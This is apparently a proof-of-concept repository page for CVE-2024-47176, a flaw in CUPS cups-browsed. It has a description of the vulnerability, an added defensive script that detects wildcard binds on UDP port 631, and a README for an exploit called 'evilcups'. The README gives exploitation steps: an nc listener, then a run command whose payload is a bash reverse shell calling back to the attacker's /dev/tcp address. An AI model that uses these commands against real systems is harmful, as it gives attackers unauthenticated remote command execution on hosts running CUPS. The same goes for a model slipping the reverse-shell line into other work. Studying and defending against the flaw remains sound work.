CVE-2024-47176 PoC — cups-browsed binds to `INADDR_ANY:631`, trusting any packet from any source

Associated Vulnerability
Title: cups-browsed binds to `INADDR_ANY:631`, trusting any packet from any source (CVE-2024-47176)

Description: CUPS is a standards-based, open-source printing system, and `cups-browsed` contains network printing functionality including, but not limited to, auto-discovering print services and shared printers. `cups-browsed` binds to `INADDR_ANY:631`, causing it to trust any packet from any source, and can be made to send a `Get-Printer-Attributes` IPP request to an attacker-controlled URL. When combined with other vulnerabilities, such as CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177, an attacker can execute arbitrary commands remotely on the target machine without authentication when a malicious printer is printed to.
Readme
# CVE-2024-47176: Remote Command Execution in CUPS
## Description
CUPS (Common UNIX Printing System) is an open-source printing system that handles networked printers. CVE-2024-47176 is a flaw in the `cups-browsed` component, which binds to `INADDR_ANY:631` and therefore trusts any packet from any source. A remote attacker can use this to make `cups-browsed` send a `Get-Printer-Attributes` IPP request to a URL the attacker controls, which leads to arbitrary command execution when combined with other vulnerabilities such as CVE-2024-47076 and CVE-2024-47175.
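
A defender-side check for the exposure described above, as an added example (not part of the original README or the evilcups project): it parses the kernel's `/proc/net/udp` socket table and flags any socket bound to the wildcard address on port 631 (hex `0277`). The sample rows are constructed, and the choice of the UDP tables rests on the fact that `cups-browsed` listens on UDP, which this page does not state.

```python
#!/usr/bin/env python3
"""Flag UDP sockets bound to the wildcard address on port 631 (added example)."""
from pathlib import Path

IPP_PORT = 631  # appears as 0277 in the hex port column

# Constructed sample in /proc/net/udp layout (not captured from a real host).
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode ref pointer drops
  101: 00000000:0277 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 31337 2 0000000000000000 0
  102: 0100007F:0277 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 31338 2 0000000000000000 0
  103: 00000000:14E9 00000000:0000 07 00000000:00000000 00:00000000 00000000   112        0 20111 2 0000000000000000 0
"""


def parse_udp_table(text):
    """Yield (addr_hex, port, uid, inode) for each socket row."""
    for line in text.splitlines():
        fields = line.split()
        # Skip the header and any short or garbled row.
        if len(fields) < 10 or not fields[0].rstrip(":").isdigit():
            continue
        addr_hex, port_hex = fields[1].rsplit(":", 1)
        yield addr_hex, int(port_hex, 16), int(fields[7]), int(fields[9])


def wildcard_ipp_binds(text):
    """Return rows bound to INADDR_ANY (or the IPv6 wildcard) on port 631."""
    return [
        {"inode": inode, "uid": uid, "family": "IPv6" if len(addr) == 32 else "IPv4"}
        for addr, port, uid, inode in parse_udp_table(text)
        # An all-zero address is the wildcard regardless of host byte order.
        if port == IPP_PORT and set(addr) == {"0"}
    ]


if __name__ == "__main__":
    for table in ("/proc/net/udp", "/proc/net/udp6"):
        path = Path(table)
        text = path.read_text() if path.exists() else ""
        for hit in wildcard_ipp_binds(text):
            print(f"{table}: wildcard bind on UDP/631 "
                  f"(uid={hit['uid']}, inode={hit['inode']})")
    print("constructed sample:", wildcard_ipp_binds(SAMPLE))
```

A hit only shows that some process holds the socket; `ss -ulpn` run as root names the owning process.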
## Steps to Exploit CVE-2024-47176

### Prerequisites
- Access to the target machine with port 631 (IPP) exposed to the internet.
- Python installed on your local machine (for running the exploit script).
- `nmap` installed for scanning the target.

---

### Setup

1. Clone the repository:

    ```bash
    git clone https://github.com/<your-username>/evilcups.git
    cd evilcups
    ```

2. Install the required Python module:

    ```bash
    pip install ippserver
    ```

3. Ensure you have a listener ready to receive a reverse shell on your local machine. You can use `nc` for this:

    ```bash
    nc -lvnp <port>
    ```

## Usage

Run the exploit script with the following syntax:

```bash
./evilcups.py <attacker_ip> <target_ip> "<command>"
```

### For example

```bash
./evilcups.py 10.10.10.10 10.10.11.40 "bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'"
```
File Snapshot

```
[4.0K] /data/pocs/1eaa1f7858f2fc4ecd1466fb495d463b4e13f83e
├── [7.4K] evilcups.py
└── [1.4K] README.md

0 directories, 2 files
```